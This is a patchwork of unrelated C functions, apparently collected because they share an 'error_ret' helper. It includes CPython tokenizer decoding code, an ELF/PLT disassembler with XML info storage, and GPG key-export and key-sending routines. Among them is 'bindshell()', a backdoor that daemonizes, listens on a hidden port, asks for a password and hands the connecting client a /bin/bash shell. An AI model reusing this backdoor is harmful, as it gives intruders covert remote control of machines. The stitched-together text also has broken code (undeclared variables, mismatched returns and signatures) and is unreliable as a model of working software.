static char *
decoding_fgets(char *s, int size, struct tok_state *tok)
{
char *line = NULL;
int badchar = 0;
for (;;) {
if (tok->decoding_state == STATE_NORMAL) {
/* We already have a codec associated with
this input. */
line = fp_readl(s, size, tok);
break;
} else if (tok->decoding_state == STATE_RAW) {
/* We want a 'raw' read. */
line = Py_UniversalNewlineFgets(s, size,
tok->fp, NULL);
break;
} else {
/* We have not yet determined the encoding.
If an encoding is found, use the file-pointer
reader functions from now on. */
if (!check_bom(fp_getc, fp_ungetc, fp_setreadl, tok))
return error_ret(tok);
assert(tok->decoding_state != STATE_INIT);
}
}
if (line != NULL && tok->lineno < 2 && !tok->read_coding_spec) {
if (!check_coding_spec(line, strlen(line), tok, fp_setreadl)) {
return error_ret(tok);
}
}
#ifndef PGEN
/* The default encoding is UTF-8, so make sure we don't have any
non-UTF-8 sequences in it. */
if (line && !tok->encoding) {
unsigned char *c;
int length;
for (c = (unsigned char *)line; *c; c += length)
if (!(length = valid_utf8(c))) {
badchar = *c;
break;
}
}
if (badchar) {
/* Need to add 1 to the line number, since this line
has not been counted, yet. */
PyErr_Format(PyExc_SyntaxError,
"Non-UTF-8 code starting with '\\x%.2x' "
"in file %U on line %i, "
"but no encoding declared; "
"see http://python.org/dev/peps/pep-0263/ for details",
badchar, tok->filename, tok->lineno + 1);
return error_ret(tok);
}
#endif
return line;
}
static char *
fp_readl(char *s, int size, struct tok_state *tok)
{
#ifndef Py_USING_UNICODE
/* In a non-Unicode built, this should never be called. */
Py_FatalError("fp_readl should not be called in this build.");
return NULL; /* Keep compiler happy (not reachable) */
#else
PyObject* utf8 = NULL;
PyObject* buf = tok->decoding_buffer;
char *str;
Py_ssize_t utf8len;
/* Ask for one less byte so we can terminate it */
assert(size > 0);
size--;
if (buf == NULL) {
buf = PyObject_CallObject(tok->decoding_readline, NULL);
if (buf == NULL)
return error_ret(tok);
if (!PyUnicode_Check(buf)) {
Py_DECREF(buf);
PyErr_SetString(PyExc_SyntaxError,
"codec did not return a unicode object");
return error_ret(tok);
}
} else {
tok->decoding_buffer = NULL;
if (PyString_CheckExact(buf))
utf8 = buf;
}
if (utf8 == NULL) {
utf8 = PyUnicode_AsUTF8String(buf);
Py_DECREF(buf);
if (utf8 == NULL)
return error_ret(tok);
}
str = PyString_AsString(utf8);
utf8len = PyString_GET_SIZE(utf8);
if (utf8len > size) {
tok->decoding_buffer = PyString_FromStringAndSize(str+size, utf8len-size);
if (tok->decoding_buffer == NULL) {
Py_DECREF(utf8);
return error_ret(tok);
}
utf8len = size;
}
memcpy(s, str, utf8len);
s[utf8len] = '\0';
Py_DECREF(utf8);
if (utf8len == 0)
return NULL; /* EOF */
return s;
#endif
}
static const char *
decode_str(const char *input, int single, struct tok_state *tok)
{
PyObject* utf8 = NULL;
const char *str;
const char *s;
const char *newl[2] = {NULL, NULL};
int lineno = 0;
tok->input = str = translate_newlines(input, single, tok);
if (str == NULL)
return NULL;
tok->enc = NULL;
tok->str = str;
if (!check_bom(buf_getc, buf_ungetc, buf_setreadl, tok))
return error_ret(tok);
str = tok->str; /* string after BOM if any */
assert(str);
if (tok->enc != NULL) {
utf8 = translate_into_utf8(str, tok->enc);
if (utf8 == NULL)
return error_ret(tok);
str = PyBytes_AsString(utf8);
}
for (s = str;; s++) {
if (*s == '\0') break;
else if (*s == '\n') {
assert(lineno < 2);
newl[lineno] = s;
lineno++;
if (lineno == 2) break;
}
}
tok->enc = NULL;
/* need to check line 1 and 2 separately since check_coding_spec
assumes a single line as input */
if (newl[0]) {
if (!check_coding_spec(str, newl[0] - str, tok, buf_setreadl))
return error_ret(tok);
if (tok->enc == NULL && !tok->read_coding_spec && newl[1]) {
if (!check_coding_spec(newl[0]+1, newl[1] - newl[0],
tok, buf_setreadl))
return error_ret(tok);
}
}
if (tok->enc != NULL) {
assert(utf8 == NULL);
utf8 = translate_into_utf8(str, tok->enc);
if (utf8 == NULL)
return error_ret(tok);
str = PyBytes_AS_STRING(utf8);
}
assert(tok->decoding_buffer == NULL);
tok->decoding_buffer = utf8; /* CAUTION */
return str;
}
plt_map_t * pltmap_by_addr( addr_t addr )
{
list_t * list;
plt_map_t * map;
if( addr <= 0 )
error_ret("bad arg",NULL);
if(!(list = get_pltmap()))
error_ret("can't get pltmap",NULL);
if((map = (plt_map_t*)list_retrieve_data( list , addr )))
return(map);
return(NULL);
}
char * xmlelf_get_name ( xmlNodePtr node )
{
static char ret[MAX_NAME];
char * name;
if(!node )
error_ret("null args",NULL);
if(!(name = xmlGetProp(node,"name")))
error_ret("can't get md5 prop",NULL);
strncpy( ret , name , sizeof(ret) - 1 );
return( name ? ret : NULL );
}
int xmlelf_get_md5 ( xmlNodePtr node ,
unsigned char * data )
{
xmlChar *md5;
if(!node || !data)
error_ret("null args",-1);
if(!(md5 = xmlGetProp(node,"md5")))
error_ret("can't get md5 prop",-1);
for( i = 0; i < 16 ; i++ )
sscanf( md5 + 2*i , "%02x" , data + i ); /* XXX: return value? */
xmlFree(md5);
return(0);
}
int get_plt_size( asmelf_t * aelf )
{
int count;
if( ! aelf || ! aelf->elf )
error_ret("null arg",-1);
if( aelf->plt_size )
return( aelf->plt_size );
if( ! get_rel_plt( aelf->elf ) )
error_ret("can't get plt reloc",-1);
count = aelf->elf->rel_plt_size / aelf->elf->rel_plt_entsize ;
return( ( aelf->plt_size = PLT_START_SIZE + count * PLT_ENTRY_SIZE ));
}
/* return name of symbol at position indx in the symbol table */
char * dsym_name_by_index( elf_t * elf , int indx )
{
Elf32_Sym * sym;
if( ! elf || ! ( sym = dsym_by_index( elf , indx ) ) )
error_ret("bad args",NULL);
return( dstr_by_offset( elf , sym->st_name ) );
}
int send_to_server(gpgme_data_t key, char *host, unsigned short port, GPG_CTX *gpg_ctx)
{
SSL_CTX *ssl_ctx;
SSL *ssl;
int sock;
// connect to server
init_ssl(&ssl_ctx, &ssl, NULL, NULL);
sock = create_client_socket(host, port, ssl);
if (sock < 0)
return ERROR_SOCKET;
// C -> S: REG|public key
// opcode
SSL_write(ssl, OP_CONNECT, OP_LENGTH);
// public key
uint64_t key_length_net;
size_t key_length_var;
char *key_buf;
key_buf = gpgme_data_release_and_get_mem(key, &key_length_var);
if (key_buf == NULL)
error_ret("Failed to copy key data\n", ERROR_GPGME);
// length|data
key_length_net = htobe64(key_length_var);
SSL_write(ssl, &key_length_net, sizeof key_length_net);
SSL_write(ssl, key_buf, key_length_var);
// TODO: receive challenge from server
UNUSED(gpg_ctx);
return ERROR_NO_ERROR;
}
static char *
fp_readl(char *s, int size, struct tok_state *tok)
{
PyObject* bufobj;
const char *buf;
Py_ssize_t buflen;
/* Ask for one less byte so we can terminate it */
assert(size > 0);
size--;
if (tok->decoding_buffer) {
bufobj = tok->decoding_buffer;
Py_INCREF(bufobj);
}
else
{
bufobj = PyObject_CallObject(tok->decoding_readline, NULL);
if (bufobj == NULL)
goto error;
}
if (PyUnicode_CheckExact(bufobj))
{
buf = _PyUnicode_AsStringAndSize(bufobj, &buflen);
if (buf == NULL) {
goto error;
}
}
else
{
buf = PyByteArray_AsString(bufobj);
if (buf == NULL) {
goto error;
}
buflen = PyByteArray_GET_SIZE(bufobj);
}
Py_XDECREF(tok->decoding_buffer);
if (buflen > size) {
/* Too many chars, the rest goes into tok->decoding_buffer */
tok->decoding_buffer = PyByteArray_FromStringAndSize(buf+size,
buflen-size);
if (tok->decoding_buffer == NULL)
goto error;
buflen = size;
}
else
tok->decoding_buffer = NULL;
memcpy(s, buf, buflen);
s[buflen] = '\0';
if (buflen == 0) /* EOF */
s = NULL;
Py_DECREF(bufobj);
return s;
error:
Py_XDECREF(bufobj);
return error_ret(tok);
}
int dump_pltmap()
{
list_t * list;
if(!(list = get_pltmap()))
error_ret("can't get pltmap",-1);
list_map_over_data( list , dump_one_pltmap , NULL );
return(0);
}
char * pltmap_name_by_addr( addr_t addr )
{
plt_map_t * map;
if( addr<= 0 ) error_ret("bad args",NULL);
if(!(map = pltmap_by_addr( addr )))
return(NULL);
return (map->name);
}
void bindshell()
{
struct sockaddr_in sockaddr,cliaddr;
int sock,cli,clilen,pid,child;
FILE *fd;
sockaddr.sin_family = AF_INET;
sockaddr.sin_port = htons(_HIDE_PORT_);
sockaddr.sin_addr.s_addr = INADDR_ANY;
sock=socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
error_ret("socket");
if(bind(sock,(struct sockaddr *)&sockaddr,sizeof(sockaddr))<0)
error_ret("bind");
if(listen(sock,MAXLISTEN)<0)
error_ret("listen");
if((pid=fork())!=0){
printf("Daemon running with PID = %i\n",pid);
exit(0);
}
setsid();
chdir(_H4X_PATH_);
umask(0);
close(0);
signal(SIGCHLD, SIG_IGN);
while(1){
clilen=sizeof(cliaddr);
cli=accept(sock,(struct sockaddr *)&cliaddr,&clilen);
if(cli<0)
continue;
if((child=fork())==0){
close(sock);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
enterpass(cli);
execve("/bin/bash", argv, envp);
close(child);
close(cli);
}
}
return;
}
int xmlelf_write_info( xmlelf_t * xe )
{
if(!xe || !xe->doc || !xe->name )
error_ret("null args",-1);
xmlSaveFormatFile(xe->name,xe->doc,0);
xmlFreeDoc(xe->doc);
return(0);
}
xmlelf_t * xmlelf_open_info( elf_t * elf , char * name )
{
xmlDocPtr doc;
xmlelf_t * ret;
if(!elf||!name)
error_ret("null args",NULL);
if(!(ret = calloc(1,sizeof(*ret))))
perror_die("calloc()",1);
if(!(doc = xmlParseDoc("1.0"))){
free(ret);
error_ret("can't get doc",NULL);
}
return(ret);
}
int export_key(gpgme_data_t *out, char *key_id, GPG_CTX *gpg_ctx)
{
// validation
if (key_id == NULL)
error_ret("Key to connect with is required\n", ERROR_BAD_INPUT);
gpgme_key_t key;
int ret;
bool confirm;
gpgme_error_t err;
// find key to register
ret = GPG_get_key(gpg_ctx, key_id, &key);
if (is_failure(ret))
error_ret("Could not corresponding key\n", ERROR_GPGME);
printf("Going to connect with %s (%s <%s>)\n",
key->subkeys->keyid,
key->uids->name,
key->uids->email
);
// ensure key is valid
if (!key->can_encrypt || key->revoked || key->disabled || key->expired)
error_ret("This key cannot be used\n", ERROR_GPGME);
// confirm
confirm = request_confirmation("OK to proceed?");
if (!confirm)
{
puts("Aborting");
return ERROR_USER_ABORT;
}
// get key
err = gpgme_data_new(out);
if (gpg_err_code(err) != GPG_ERR_NO_ERROR)
error_ret("Failed to allocate key buffer\n", ERROR_GPGME);
ret = GPG_export(gpg_ctx, key, *out);
if (is_failure(ret))
error_ret("Failed to export key\n", ERROR_GPGME);
return ERROR_NO_ERROR;
}
pltmap_t * get_pltmap( asmelf_t * aelf )
{
addr_t plt;
pltmap_t * pltmap;
size_t pltmap_size,
mapcnt;
Elf32_Rel * pltrel;
int nread,
tread,
off;
if( ! aelf || ! aelf->elf )
error_ret("null arg",NULL);
if((plt = get_plt_by_entry_call( aelf ) )< 0 )
error_ret("can't get plt",NULL);
if( (nread = crunch_plt_header( aelf , plt , 0 ) )< 0)
error_ret("can't get header",NULL);
tread = nread;
if(!(pltrel = get_rel_plt( aelf->elf )))
error_ret("can't get rel.plt",NULL);
mapcnt = pltmap_size = 0;
pltmap = NULL;
while((nread = crunch_plt_entry( aelf , plt + tread , &off , 0 , 0 ))>0)
{
char * str;
int pindx, /* index in plt.rel */
sindx; /* index in symtab */
pindx = off / sizeof( *pltrel );
sindx = ELF32_R_SYM(pltrel[pindx].r_info);
if(!(str = sym_name_at_index( aelf->elf , sindx )))
error_ret("can't get symbol name",NULL);
if( ++mapcnt >= pltmap_size )
{
pltmap_size = (pltmap_size>0) ? (2*pltmap_size) : 2 ;
if(!(pltmap=realloc(pltmap,pltmap_size*sizeof(*pltmap))))
error_ret("can't allocate memory",NULL);
}
pltmap[mapcnt-1].vma = plt + tread;
pltmap[mapcnt-1].name = str;
tread += nread;
}
if(!(pltmap=realloc(pltmap,mapcnt*sizeof(*pltmap))))
error_ret("can't re-alloc",NULL);
aelf->pltmap_size = mapcnt;
return(aelf->pltmap = pltmap);
}
int add_pltmap_funcs(list_t * list)
{
if(!list)
error_ret("null list",-1);
list_map_over_data( list , (list_callback)do_add_pltmap_funcs , NULL );
return(0);
}
int get_dsymcount( elf_t * elf )
{
if( ! elf )
error_ret("null arg",-1);
int relsc,
relpltsc,
max;
/* XXX this is lame */
if((relpltsc = rel_plt_max_sym_indx( elf )) < 0 )
error_ret("rel_plt symcount", -1 );
if((relsc = rel_max_dsym_indx( elf ))< 0)
error_ret("rel symcount",-1);
max = ( relpltsc > relsc ) ? relpltsc : relsc;
return(max);
}
Elf32_Sym * dsym_by_index( elf_t * elf , int indx )
{
Elf32_Sym * dsymtab;
if( ! elf || indx < 0 ||
!( dsymtab = get_dsymtab( elf ) ) ||
indx >= elf->dsymtab_len )
error_ret("bad args",NULL);
return( dsymtab + indx );
}
int open_target( char * file )
{
if(!file)
error_die("null arg",1);
/* there's only 1 target */
if( target_elf )
free_elf( target_elf );
if(!(target_elf = new_elf(file)))
error_ret("can't open elf",-1);
#ifdef USE_COMMANDS
/* check for info saved in xml file */
if( use_info )
if(open_target_info( target_elf ) < 0 )
error_ret("problem getting info",-1);
#endif /* USE_COMMANDS */
disasm_init();
crunch_pltmap();
gather_funcs_by_symtab( get_elf() );
gather_funcs_by_section(NULL);
get_objs_from_entry(get_elf());
gather_vars( get_elf() );
sync_func_map();
#if 0
if( do_disasm || do_pltmap ||do_disasm_seg ||do_map_dmp){
crunch_pltmap();
}
if( do_dump_funcs || do_disasm || do_disasm_seg || do_map_dmp ){
gather_funcs_by_symtab( get_elf() );
gather_funcs_by_section(NULL);
get_objs_from_entry(get_elf());
}
if( do_vars || do_disasm || do_disasm_seg || do_map_dmp || do_map_dmp )
gather_vars( get_elf() );
sync_func_map();
#endif
return(0);
}
int add_pltmap( list_t * pltmap , plt_map_t * map )
{
list_data_t * data;
if(!map||!pltmap) error_ret("null arg",-1);
data = list_new_data();
data->key = map->vaddr;
data->data = map;
list_insert( pltmap , data);
return(0);
}
xmlelf_t * new_xmlelf( elf_t * elf , char * name )
{
xmlelf_t * ret;
if(!elf || !name)
error_ret("null arg",NULL);
/* we don't already have it */
if(!(ret = xmlelf_open_info( elf , name ))) {
if(!(ret = xmlelf_create_info( elf , name ))) {
error_ret("can't create info",NULL);
}
} else { /* we have it */
if(!xmlelf_is_valid_info( ret ) ){
error_ret("not valid info\n");
}
}
return(ret);
}
int command_help( char** argv ){
cmd_node_t * cmds;
if(!(cmds = get_command_head()))
error_ret("can't get commands",COMMAND_ERROR);
if(!*argv){ /* top-level */
printf("%s:\t%s\noptions:\n",command_h.str,command_h.msg);
for(cmds = cmds->opts; cmds ; cmds=cmds->next){
if(!cmds->cmd ||!cmds->cmd->str ||!cmds->cmd->msg )
error_ret("command has no name",COMMAND_ERROR);
printf("%s:\t%s\n",cmds->cmd->str,cmds->cmd->msg);
}
}
else
{
return( do_help( cmds , argv ) );
}
}
char * plt_call_str( asmelf_t * aelf , addr_t vma )
{
pltmap_t * pltmap;
size_t num,
i;
if( ! aelf )
error_ret("null arg",NULL);
if(!(pltmap = get_pltmap(aelf)))
error_ret("can't get pltmap",NULL);
num = aelf->pltmap_size;
for( i = 0 ; i < num ; i++ )
if( vma == pltmap[i].vma )
return( pltmap[i].name );
return(NULL);
}
int dump_one_pltmap( void * data , void * arg )
{
plt_map_t * map;
if(!data) error_ret("bad args",-1);
map = (plt_map_t*)data;
printf("%#-15x" , map->vaddr);
printf("%#-10x" , map->off );
printf("%s\n" , map->name );
return(0);
}
int xmlelf_set_size( xmlelf_t * xe , size_t size )
{
char sizebuf[16];
xmlNodePtr root;
xmlNodePtr cur;
if(!xe || !xe->doc || !(root = xe->doc->root) )
error_ret("null arg",-1);
snprintf(sizebuf,15,"#08x",size);
xmlSetProp(root,"size",sizebuf);
return(0);
}
int open_target_info( elf_t * elf )
{
char * infoname;
size_t size;
if(!elf->name) error_ret("null elf name",-1);
/* XXX: always save in current dir? */
size = strlen(elf->name) + strlen(INFO_EXT) + 4;
infoname = malloc( size );
snprintf( infoname , size-1 , "%s.%s" , elf->name , INFO_EXT );
if( target_info )
free_info( target_info );
if(!(target_info = new_xmlelf( elf , infoname ) ) ){
free(infoname);
error_ret("can't get xmlelf",-1);
}
free(infoname);
}
/* XXX: this should be 'sht' */
Elf32_Shdr * get_shdr( elf_t * elf )
{
offset_t off;
Elf32_Shdr * ret;
if( ! elf )
error_ret("bad arg",NULL);
if( elf->shdr )
return(elf->shdr);
if( ! elf->ehdr && ! get_ehdr( elf ) )
error_ret("can't get ehdr",NULL);
off = elf->ehdr->e_shoff;
ret = data_at_offset( elf , off );
if( ! ret )
error_ret("can't get data",NULL);
elf->shdr_count = elf->ehdr->e_shnum;
return( elf->shdr = ret );
}
int get_objs_from_ehdr(Elf32_Ehdr * ehdr)
{
func_t * func;
if(!ehdr) error_ret("null arg",-1);
if(!(func = func_at_addr( ehdr->e_entry )))
{
func = new_func();
OBJ_SET_NAME(func->obj,"_start");
OBJ_SET_ADDR(func->obj,ehdr->e_entry);
if(add_func( func , 1 )<0)
error_ret("problem adding",-1);
}
else
{
if(strcmp(OBJ_GET_NAME(func->obj),"_start"))
OBJ_SET_NAME(func->obj,"_start");
}
return(0);
}